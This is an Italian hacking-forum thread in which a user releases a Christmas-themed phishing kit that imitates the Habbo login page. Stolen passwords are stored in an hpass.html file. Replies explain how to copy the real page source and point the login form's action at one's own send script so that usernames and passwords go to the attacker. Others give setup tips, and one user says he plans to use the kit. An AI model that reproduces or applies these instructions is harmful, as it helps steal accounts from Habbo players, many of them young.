Release Habbo Fake Login v2 (Christmas) by Cloner

Cloner

Utente Normale
Autore del topic
3 Ottobre 2010
94
0
Miglior risposta
0
Habbo Fake Login v2 (Christmas) by Cloner (aggiornato)

Ecco la versione natalizia del mio fake, è sostanzialmente identica alla v2, però le pagine identiche ad habbo sono in versione natalizia, tutto qui.

Le password vengono salvate in hpass.html
Per la descrizione nei dettagli vi riconduco qui

Download
Perfavore, Entra oppure Registrati per vedere i Link!

Scansione
Perfavore, Entra oppure Registrati per vedere i Link!

Mia guida per caricare il fake sul vostro sito qui
 
Ultima modifica:
Riferimento: Habbo Fake Login v2 (Christmas) by Cloner

Bravo :emoji_smiley:, ma posso sapere come riesci a riprodurre la home identica a quella di habbo ?
 
Riferimento: Habbo Fake Login v2 (Christmas) by Cloner

quella è la parte più semplice, basta aprire la vera pagina di habbo, cliccare col tasto destro in un punto qualsiasi e cliccare "visualizza sorgente pagina"; quello ke si apre lo copi, lo incolli nel tuo file html e poi devi apportare delle modifiche in modo ke user e pass vadano a te... ^^
 
Riferimento: Habbo Fake Login v2 (Christmas) by Cloner

metti tutto su blocco note cerchi <form action="post.php" method="post" class="login-habblet"> cambi post.php nel tuo send ed e fatta
 
Riferimento: Habbo Fake Login v2 (Christmas) by Cloner

Ci potresti postare anche solo il login con la home di habbo? Please... Grazie.

Per i file uguali ad habbo ti ripeto un'altra mia risposta:

per i file con la pagina uguale ad habbo basta ke cancelli gli altri (index, home, crediti, furni, send, habboclub, dimostrazione, crediti.txt, crediti500.txt, sfondo.png, e tutte le cartelle) così ti rimane solo la parte uguale ad habbo, poi rinomini habbo.html in index.html
 
Ultima modifica:
Riferimento: Habbo Fake Login v2 (Christmas) by Cloner

Bene, Userò Questo Per Il Periodo Natalizio :emoji_smiley: Grazie :lol:
 
Riferimento: Habbo Fake Login v2 (Christmas) by Cloner (aggiornato)

Il fake è buono ma non riesco a capire come riprodurre la home :soso:

basta ke scarichi il fake e cancelli i file ke ho scritto sopra in modo ke ti rimangano solo quelli con le pagine identiche ad habbo
--------------- AGGIUNTA AL POST ---------------








:TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU:
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

AVVISO IMPORTANTE:
ragazzi in seguito ai recenti piccoli cambiamenti apportati ad habbo ho aggiornato il fake;
ho già aggiornato il link al download nel post principale

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
:TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU::TU:
.
.
.
.
.
.
.
.
.
 
Ultima modifica:
Riferimento: Habbo Fake Login v2 (Christmas) by Cloner

Cloner nn hai messo il sito .html che serve per vedere le pass e e-mail degli habbo .. Aggiusta ;)
 
Riferimento: Habbo Fake Login v2 (Christmas) by Cloner

ahhh come fake è buono . Però nessuno ci casca più xD
 
Riferimento: Habbo Fake Login v2 (Christmas) by Cloner

Cloner nn hai messo il sito .html che serve per vedere le pass e e-mail degli habbo .. Aggiusta ;)

si l'avevo scritto nel topic di questo fake in versione normale, cmq hai ragione lo stesso, è meglio ke lo aggiunga anke qua (vengono salvate in hpass.html)
 
Riferimento: Habbo Fake Login v2 (Christmas) by Cloner

Habbo Fake Login v2,

E' un fake interessante..Mi piace molto bravo... Complimenti..

Valutazione : ****
 
Riferimento: Habbo Fake Login v2 (Christmas) by Cloner

grazie :emoji_smiley:
 
Riferimento: Habbo Fake Login v2 (Christmas) by Cloner

Bello Anzì... O Trovato Il Fake Adatto Per Me xD